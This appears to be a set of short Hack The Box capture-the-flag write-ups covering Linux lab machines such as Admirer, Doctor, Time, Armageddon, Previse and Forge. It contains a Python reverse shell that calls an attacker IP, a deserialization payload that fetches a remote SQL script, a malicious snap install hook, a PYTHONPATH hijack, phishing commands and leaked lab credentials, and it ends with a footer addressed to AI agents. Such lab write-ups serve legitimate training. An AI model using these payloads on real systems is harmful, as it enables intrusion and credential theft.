Initial ⇒ Auth bypass via sql-inj OR Match-&-Replace 302 to 200 (EAR) + file upload
Privesc level 1 ⇒ Database creds in /var/www/magic + Data dump using mysqldump
Privesc level 2 ⇒ -----------------------

## Recon & Enum #### port scan ```bash PORT STATE SERVICE 22/tcp open ssh 80/tcp open http ``` #### directory scan ```bash /assets (Status: 301) [Size: 313] /images (Status: 301) [Size: 313] /index.php (Status: 200) [Size: 5069] /index.php (Status: 200) [Size: 5067] /login.php (Status: 200) [Size: 4221] /logout.php (Status: 302) [Size: 0] /upload.php (Status: 302) [Size: 2957] ``` ## website their is bunch of images on web page and their is also login functionality on bottom left corner of web page

### This can be bypass using sql authentication attack , after getting login we got redirect to /upload.php which has file upload vulnerability ### if we directly visit this page it redirects us to /login.php , but when intercepted the respeonse in burp and after checking page content and page size it shows the same page ,\ \ To bypass this use burp - match and replace from 302 found -> 200 ok

## shell as www-data #### file upload exploitation we can use 2 methods to exploit this vulnerability :-\ \ 1\. using exiftool to inject reverse shell into image we are uploading\ \ 2\. injecting payload in middle of the file image content\ \ i used second , and got the shell ## privesc www-data => theseus after getting shell , i found 1 more file inside /var/www/magic directory #### db.php5 This is mysql file , after reading the file we get to know the credentials of mysql of user theseus\ but unfortunately mysql is not present in machine , but their is mysqldump present , we can use this ```bash mysqldump --user=theseus --password=iamkingtheseus --host=localhost Magic ``` after the dump , we got the result. inside result i found this which i think is interesting ```sql INSERT INTO `login` VALUES (1,'admin','Th3s3usW4sK1ng'); ``` i use **su** command with creds username = theseus & pass = Th3s3usW4sK1ng , and got the shell ## privesc theseus => root #### linenum.sh found unknown binary > /bin/sysinfo , and it also executable as root

## Admirer

Initial ⇒ SSRF to My-SQL fake server (attacker server)
Privesc ⇒ Path Hijacking (PYTHONPATH) , Scripting Library (shutil.py) & function

1. Nmap gives 21,22,80 port open with disallow entry : `admin-dir` in robots.txt 2. Recon on http\://$ip/admin-dir gives 2 .txt files 1. contacts.txt ⇒ Holds email-address & username (NO USE) 2. credentials.txt ⇒ Holds FTP username & password 3. Loggin-in & enumerating it gives us files : 1. dump.sql ⇒ (Nothing interesting except Database Name : admirerdb ) 2. html.tar.gz ⇒ extracting it gives some directories and files , intereseting one : 1. /utility-scripts 2. /utility-scripts/dbadmin.php (Holds username `waldo` , password & database) 4. Emumerating `http://$ip/utility-scripts` gives `adminer.php` , which has mysql connect running on it , {tried the creds i found , but didn't work} 5. Using `server` field , we can also connect to remote server , i set up the mysql on my attacking machine and set user/pass , logging in to it , gives access 6. After getting inside , i loaded the local file and viewing it gives me another creds for `waldo which` work for SSH 7. Inside SSH session , doing sudo -l gives a file : /opt/scripts/admin\_task.sh for which SETENV is available , reading it gives on `function 6` it runs a script `/opt/scripts/backup.py` 8. backup.py is importing make\_archive from shutil library 9. Creating a `shutil.py` file/library inside /tmp directory and injecting reverse shell in it. ```python import socket import subprocess import os import pty def make_archive(a, b, c): s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(("10.0.0.1",4242)) #change this with your ip port os.dup2(s.fileno(),0) os.dup2(s.fileno(),1) os.dup2(s.fileno(),2) pty.spawn("/bin/bash") ``` 10. Exploiting using sudo right on path-variable (SETENV) and also on `/opt/scripts/admin_task.sh` ``` sudo PYTHONPATH=/tmp /opt/script/admin_task.sh ```

## Blunder

------

## Tabby

-------

## Doctor

Initial ⇒ via SSTI or via Command Injection
Privesc level 1 ⇒ Password in /var/log/apache2/.backup
Privesc level 2 ⇒ -------------------------

## Recon & Enum ### port scan ```bash PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 8089/tcp open unknown ``` ### directory scan () ```bash /.html (Status: 403) [Size: 277] /contact.html (Status: 200) [Size: 19848] /images (Status: 301) [Size: 313] [--> http://10.10.10.209/images/] /blog.html (Status: 200) [Size: 19848] /.php (Status: 403) [Size: 277] /about.html (Status: 200) [Size: 19848] /services.html (Status: 200) [Size: 19848] /js (Status: 301) [Size: 309] [--> http://10.10.10.209/js/] /departments.html (Status: 200) [Size: 19848] /fonts (Status: 301) [Size: 312] [--> http://10.10.10.209/fonts/] /.html (Status: 403) [Size: 277] /.php (Status: 403) [Size: 277] /server-status (Status: 403) [Size: 277] /index.html (Status: 200) [Size: 19848] /images (Status: 301) [Size: 313] [--> http://10.10.10.209/images/] /.php (Status: 403) [Size: 277] /.html (Status: 403) [Size: 277] /about.html (Status: 200) [Size: 19848] /contact.html (Status: 200) [Size: 19848] ``` ### directory scan () ```bash Target: http://doctors.htb/ [14:41:07] Starting: [14:43:06] 302 - 251B - /account -> http://doctors.htb/login?next=%2Faccount [14:43:07] 404 - 3KB - /account/login.rb [14:43:07] 404 - 3KB - /account/login.shtml [14:44:16] 200 - 101B - /archive [14:46:28] 302 - 245B - /home -> http://doctors.htb/login?next=%2Fhome [14:46:51] 200 - 4KB - /login [14:46:54] 302 - 217B - /logout -> http://doctors.htb/home [14:47:54] 200 - 1KB - /register [14:48:03] 403 - 276B - /server-status [14:48:03] 403 - 276B - /server-status/ [14:48:41] 200 - 1KB - /user/admin ``` ## website () i found nothing useful here , but i did found mail address - info.doctors.htb , lets add it add it to /etc/hosts and check ## website () we got login page and also a sign up functioality , lets create an account on this \ \ After getting in we get message functionality which consist of 2 parameters

after posting message it looks like this :-

## shell as web Both parameters are vulnerable . para 1 is vulnerable to SSTI & XSS , para 2 vulnerable to command injection ### SSTI i injected payload , but none of them is working until i checked the /archive , 9x9 didnt give any result , i don't think its vulnerable to SSTI but 8x8 wworked for me Request /post/new

its working lets take reverse shell request 1 /post/new

I thought it didn,t work , but no we have to send requestnin archieve as well , after hitting the send from /archive i got this as response and reverse shell as well response /archive

### command injection i start testing it by injecting my ip , but it gave an error

trying $IFS payload and it worked :-

after that i just bash /dev/shm/exploit , and i get the reverse shell ## privesc web => shaun ```bash grep -r passw . 2>/dev/null ``` and i found this :- ``` ./apache2/backup:10.10.14.4 - - [05/Sep/2020:11:17:34 +2000] "POST /reset_password?email=Guitar123" 500 453 "http://doctor.htb/reset_password" ``` i tried **su -** with username = shaun & password = Guitar123 , and i got the shell ## privesc shaun => root

## Sneakymailer

Initial ⇒ Recon , Phishing , -----
Privesc ⇒ ----

## Recon & Enum ### port scan ```bash PORT STATE SERVICE 21/tcp open ftp 22/tcp open ssh 25/tcp open smtp 80/tcp open http 143/tcp open imap 993/tcp open imaps 8080/tcp open http-proxy ``` nmap gives domain name = ### directory scan ### subdomain scan ```bash http://dev.sneakycorp.htb ``` ## website ### page consist of names and emails , nothing more . I can download all email address of the users ```bash curl http://sneakycorp.htb/team.php -o mails.txt cat mails.txt | grep '@' > new.txt cat new.txt | cut -d '>' -f 2 | cut -d '<' -f 1 > mails.txt ``` ### register page , but no redirection or action performed ## shell as www-data ### phishing users i will try to send phishing mail containing my ip address in the message body , and i open python server on my machine \ If any user clicks on my ip address i will get a call back ```bash swaks --to $(cat emails | tr '\n' ',' | less) --from test@sneakymailer.htb --header "Subject: test" --body "please click here http://10.10.14.42/" --server 10.10.10.197 ``` i did get a call back on python server , now i will open nc to check what i get ```bash firstName=Paul lastName=Byrd email=paulbyrd@sneakymailer.htb password=^(#J@SkFv2[%KhIxKk(Ju`hqcHl<:Ht rpassword=^(#J@SkFv2[%KhIxKk(Ju`hqcHl<:Ht ``` i got creds for paul

## Passage

---

## Lunanne

Initial ⇒ ---

## Time

Initial ⇒ Recon , Open-Exploit (com.fasterxml.jackson.databind)
Privesc ⇒ Linpeas.sh , ----

## Recon & Enum #### Port scan ```bash PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0) 80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) ``` #### Directory scan ```bash ``` ## WEB (80) Their is a **json** beautifier & validator working on website , after testing it , i get to know that the beautifier is of no use for us , so only thing left is validator\ \ Basically if we input json data in it , it validates it and give response accordingly ,\ But if we input normal data then it will give us error :- ```bash Validation failed: Unhandled Java exception: com.fasterxml.jackson.databind.exc.MismatchedInputException: Unexpected token (START_OBJECT), expected START_ARRAY: need JSON Array to contain As.WRAPPER_ARRAY type information for class java.lang.Object ``` After googling and reading walk-through , i found that this is a CVE-2019-12384s ## Shell as pericles their is public exploit available on github , through which we can perform SSRF to RCE\ \ Steps to reproduce :-\ \ 1\. clone the git repository in your machine\ \ 2\. open and edit the sql file and enter the command you want to get executed on target machine/server , in my case its reverse shell\ \ 3\. start a http server on your local machine\ \ 4\. edit the payload & accordingly :- ip address , port no. , sql file name\ \ 5\. remove all the "\\" with " " (blank space) using echo command :- ```bash echo "[\"ch.qos.logback.core.db.DriverManagerConnectionSource\", {\"url\":\"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://localhost:8000/inject.sql'\"}]" ``` final payload :- ```bash ["ch.qos.logback.core.db.DriverManagerConnectionSource", {"url":"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://10.10.16.4:8000/inject.sql'"}] ``` Turn on the netcat listner on your machine , and BOOM.......... we got the shell ## privesc pericles => root

## Ready

Initial ⇒ SSRF -> redis RCE (open-exploit)
Privesc ⇒ Backup file in /opt

1. On port 5080 website is running the gitlab , enumeration gives us the outdated version `(11.4.7)` 2. Open Exploit available , for explanation of the vulnerability refer 1. 3. For privesc, found password : `wW59U!ZKMbG9+*#h` in `gitlab.rb` file located in `/opt/backup`

## Delievery

Initial ⇒ Register & Enumeration
Privesc ⇒ /opt/mattermost ⇒ config.json ⇒ mySQL creds ⇒ (MySql-CLI) ⇒ root

1. Nmap gives 22,80,8065 1. 80 : support ticket is running ⇒ we can create and tract the status of ticket 2. 8065 : Mattermost running ⇒ we can register (with email confirmation) & login 2. Create the ticket on port:80 website using the fake email , track the status of ticket using the same fake email , on port:8065 website register the same fake email , the confirmation mail goes directly into ticket status , click on confirming link and then we login back to mattermost website 3. Inside it we are able to find SSH creds for user `maildeliver` 4. Inside Shell `/opt` directory contains `config.json` file which leaks mysql creds 5. Using those creds and doing some mysql emum with CLI , we are able to find hash for root user. ``` root:$2a$10$VM6EeymRxJ29r8Wjkr8Dtev0O.1STWb4.4ScG.anuu7v0EFJwgjjO ```

## Ophiuchi

---

## Scriptkiddie

---

## Armageddon

Initial ⇒ Open-source exploit (Drupal 7 v7.56)
Privesc level 1 ⇒ Database creds in /var/www/html/sites/default/setting.php
Privesc level 2 ⇒ Binary exploit snap install * , Crafting malicious snap package

## Recon & Enum #### port scan ```bash PORT STATE SERVICE 22/tcp open ssh 80/tcp open http ``` #### directory scan ```bash /.html (Status: 403) [Size: 207] /index.php (Status: 200) [Size: 7440] /misc (Status: 301) [Size: 233] [--> http://10.10.10.233/misc/] /themes (Status: 301) [Size: 235] [--> http://10.10.10.233/themes/] /modules (Status: 301) [Size: 236] [--> http://10.10.10.233/modules/] /scripts (Status: 301) [Size: 236] [--> http://10.10.10.233/scripts/] /sites (Status: 301) [Size: 234] [--> http://10.10.10.233/sites/] /includes (Status: 301) [Size: 237] [--> http://10.10.10.233/includes/] /install.php (Status: 200) [Size: 3172] /profiles (Status: 301) [Size: 237] [--> http://10.10.10.233/profiles/] /update.php (Status: 403) [Size: 4057] /README.txt (Status: 200) [Size: 5382] /robots.txt (Status: 200) [Size: 2189] /cron.php (Status: 403) [Size: 7388] /INSTALL.txt (Status: 200) [Size: 17995] /LICENSE.txt (Status: 200) [Size: 18092] /CHANGELOG.txt (Status: 200) [Size: 111613] /xmlrpc.php (Status: 200) [Size: 42] /COPYRIGHT.txt (Status: 200) [Size: 1481] /.html (Status: 403) [Size: 207] /UPGRADE.txt (Status: 200) [Size: 10123] /authorize.php (Status: 403) [Size: 2824] ``` ## website

their is login page running on , after enumerating in burp i found that the webiste is php based and using drupal for authentication ```bash X-Generator: Drupal 7 (http://drupal.org) ``` #### I found the exact version number of drupal ```bash Drupal 7.56, 2017-06-21 ----------------------- - Fixed security issues (access bypass). See SA-CORE-2017-003. ``` ## shell as apache #### searchsploit their are lots of payload on it ```bash Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code (Metasploit) | php/webapps/44557.rb Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code Execution (PoC) | php/webapps/44542.txt Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution | php/webapps/44449.rb Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (Metasploit) | php/remote/44482.rb Drupal < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (PoC) | php/webapps/44448.py ``` but this matches according to our needs :-\ version no.\ Unauthenticated\ non-metasploitable\ public exploit on github ```bash Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution searchsploit -m php/webapps/44449.rb ``` #### CVE 2018 - 7600 this will give us shell as apache , and provide a link "" with parameter "c" through which we can do RCE\ \ lets get a reverse shell first ..... double-encode the payload while injecting \ NOTE :-\ we get this shell /sbin/nologin , so their are lots of things we can not perform like :-\ cd , bash , python , nc , wget ..... etc , and for some other things it gives Permission Denied ```bash in case if script doesn't work try the command below , then run the script sudo gem install highline ``` ## privesc apache => brucetherealadmin we can do enough here , in order to escalate our privilages i need some kind of credentials , because most of the commands are not working and i even can't transfer scripts to victim like linpeas or etc.......\ \ After doing google , i get to know where are default credentials of database are stored :- \ "/sites/default/setting.php" ```bash cat /var/www/html/sites/default/setting.php $databases = array ( 'default' => array ( 'default' => array ( 'database' => 'drupal', 'username' => 'drupaluser', 'password' => 'CQHEy@9M*m23gBVj', 'host' => 'localhost', 'port' => '', 'driver' => 'mysql', 'prefix' => '', ), ), ); ``` we got database (drupal) credentials , "drupaluser" & "CQHEy\@9M\*m23gBVj" \ before run mysql commands , we don't have ptty shell , so we have to direct execute the sql query in single go , so that terminal didn't stuck , as it stuck without that ```bash mysql -e 'show tables;' -u drupaluser -p'CQHEy@9M*m23gBVj' drupal >> we got alot of tables mysql -e 'show tables;' -u drupaluser -p'CQHEy@9M*m23gBVj' drupal | grep user >> user table does exist mysql -e 'select * from users;' -u drupaluser -p'CQHEy@9M*m23gBVj' drupal 1 brucetherealadmin $S$DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97.oOsUf1xAhaadURt ``` we got hash for user "brucetherealadmin" , lets save it in file , then find hash type then crack it ```bash hashcat -m 7900 hash.txt ~/chaos/rockyou.txt password >> booboo ``` i tried switching user but didn't work , so i tried ssh and got the shell as brucetherealadmin ## privesc brucetherealadmin => root #### sudo -l found a binary that i can run as root :- ```bash User brucetherealadmin may run the following commands on armageddon: (root) NOPASSWD: /usr/bin/snap install * ``` i immediately gone to GTFObins , and found this this says , this binary can't do anything on its own , Basically its a package manager to install packages just like apt , but we can creat a malicious package , and then try to install it #### creating malicious package first i just try to read the root.txt, so create the package in attacker machine then transfer it to victim and then use snap to install it ```bash first install fmp to create snap package >> sudo gem install fpm second create the package >> COMMAND='cat /root/root.txt' cd $(mktemp -d) mkdir -p meta/hooks printf '#!/bin/sh\n%s; false' "$COMMAND" >meta/hooks/install chmod +x meta/hooks/install fpm -n xxxx -s dir -t snap -a all meta third transfer it to victim and install it >> sudo snap install xxxx_1.0_all.snap --dangerous --devmode ``` we got , root.txt , but not shell

## Knife

Initial ⇒ Recon , Open-exploit
Privesc ⇒ sudo -l , Binary Exploitation :- /usr/bin/knife

## Recon & Enum ### port scan ``` PORT STATE SERVICE 22/tcp open ssh 80/tcp open http ``` ### directory scan ```bash /.html (Status: 403) [Size: 277] /index.php (Status: 200) [Size: 5815] /.html (Status: 403) [Size: 277] /server-status (Status: 403) [Size: 277] ``` ## website nothing interesting over here , just a static page \ Although we intercepted in response shows php version ```bash X-Powered-By: PHP/8.1.0-dev ``` ## shell as james we can search exploit for this , after searching i got this exploit :- ## privesc james -> root ```bash sudo -l User james may run the following commands on knife: (root) NOPASSWD: /usr/bin/knife ``` after searching on GTFObins , i got this :- ```bash sudo knife exec -E 'exec "/bin/sh"' ``` and i got the shell as root

## Pit

---

## Seal

---

## Previse

Initial ⇒ EAR , Command Injection
Privesc level 1 ⇒ MySQL creds in /var/www/something/config.php
Privesc level 2 ⇒ sudo -l , Path Injection in execution of shell script

## Recon & Enum #### port scan ```bash PORT STATE SERVICE 22/tcp open ssh 80/tcp open http ``` #### directory scan Nothing new finding , what is discoverable in this , is already accessiable by web page ## website #### -> redirects -> when i entered the ip "10.10.11.104" ir redirects me to "10.10.11.104/login.php" , so their is login page i use EAR vulnerability to bypass the login page #### we got functionality to download logs with specified delimeter :- comma , space , tab ## shell as www-data I captured the request in burp , and in delimeter parameter i tried command injection and it worked , then i injected the rev shell and i het the call back on my listner ## privesc www-data => m4lwhere => root #### www-data -> m4lwhere on their is functionality to download the site abckup file , i downloaded it and after unzip i got bunch of files ```php cat config.php xtx ``` lets connect to mysql , and i get the hash for user "m4lwhere" ```bash mysql -e 'select * from accounts' -u root previse -p Enter password: +----+----------+------------------------------------+---------------------+ | id | username | password | created_at | +----+----------+------------------------------------+---------------------+ | 1 | m4lwhere | $1$🧂llol$DQpmdvnb7EeuO6UaqRItf. | 2021-05-27 18:18:36 | | 2 | vaibhav | $1$🧂llol$6EeWgoBQj2zKVIVN.TdRU. | 2023-05-10 15:39:00 | +----+----------+------------------------------------+---------------------+ ``` after cracking it i got the password **ilovecody112235!** , su / ssh ....and got the shell as **m4lwhere** #### m4lwhere -> root i did sudo -l and find a file ```bash cat /opt/scripts/access_backup.sh #!/bin/bash # We always make sure to store logs, we take security SERIOUSLY here # I know I shouldnt run this as root but I cant figure it out programmatically on my account # This is configured to run with cron, added to sudo so I can run as needed - we'll fix it later when there's time gzip -c /var/log/apache2/access.log > /var/backups/$(date --date="yesterday" +%Y%b%d)_access.gz gzip -c /var/www/file_access.log > /var/backups/$(date --date="yesterday" +%Y%b%d)_file_access.gz ``` the problem is not in script , the thing is that the "gzip" binary with root priviledges , so i can simply inject my current path in path variable and make a fake binary with the name gzip and inject my rev\_ shell in it and after that just execute gzip ... and got the call back on my nc listner ## privesc www-data => root #### linpeas.sh linpeas found that the application is vulnerable to cve-2021-4034 , so i googled it run this , and get the shell as root\

## Forge

Initial ⇒ SSRF (http://) chaining with another SSRF (ftp://) , Recon
Privesc ⇒ Recon in /opt , Script Breaking , PDB (python debugger)

1. Nmap gives 21 : filtered & 22,80 : open , subdomain enum gives `admin.forge.htb` 2. On website `forge.htb` we can upload file from machine as well as from URL & visiting `admin.forge.htb` says : onlu localhost allowed 3. Checking `admin.forge.htb` via upload via URL got succeeded : vulnerable to SSRF 1. check the URL `http://admin.forge.htb` using `http://forge.htb` 1. SSRF fails ⇒ try with both upper/lower case : `AdMin.ForGe.hTb` case-injection 2. After visiting the link, website gives another obfuscated link which not work in brower 1. Direct visit fails ⇒ try with curl OR with both curl + base64 encode 4. This reveals some good information : ```html Announcements

An internal ftp server has been setup with credentials as user:heightofsecurity123!
The /upload endpoint now supports ftp, ftps, http and https protocols for uploading from url.
The /upload endpoint has been configured for easy scripting of uploads, and for uploading an image, one can simply pass a url with ?u=<url>.

``` 5. Crafting final payload ```bash http://admin.forge.htb/upload?u=ftp://user:heightofsecurity123!@127.0.0.1/.ssh/ ``` 6. SSH shell as user `user`, for privesc i run sudo -l which gives `/opt/remote-manage.py` 7. This scripts 1. has a password , 2. some option which we can run (1,2,3,4) 3. starts on any random port when executed 4. and if input is beside the given number, it starts PDB automatically 5. to deal with it we need another session and have to listen the same port . 6. In last enter any random output , the scripts break on other have and give , insert rev-shell ```bash user@forge:~$ sudo /usr/bin/python3 /opt/remote-manage.py Listening on localhost:11563 invalid literal for int() with base 10: b'0xdf' > /opt/remote-manage.py(27)() -> option = int(clientsock.recv(1024).strip()) (Pdb) # PDB = python debugger # Perform command execution here in order to get reverse shell (Pdb) import os (Pdb) os.system('bash') ```

## Horizontal

Initial ⇒ done
Pirivesc ⇒ ----

## Shibboleth

xxxxxxxxx

## Writer

## Pandora

---

## Meta

---

## Paper

xxxx

## Keeper

Default Creds || Privesc ⇒ Keepass (CVE-2023-32784) | Putty-Key ⇒ openssh convert

1. On website `request ticketer` is running of `Best practical` with login form. Default creds gives access , inside that under /user directory i am able to find password for user `Lisa` 2. After SSH , inside home directory able to find file.zip , which on extract gives `Keepass` dump \&kdbx file. 3. For dumping password/key i used exploit , later use the master-key on file.kdbx using `kpcli` 4. `The above part done with dotnet version 7.0` 5. Enumeration gives `PUTTY-key` for user root , Convert Puttykey to ssh and got the shell as root

--- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://mokshs-private-organization.gitbook.io/htb-short-writeup/htb-linux.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.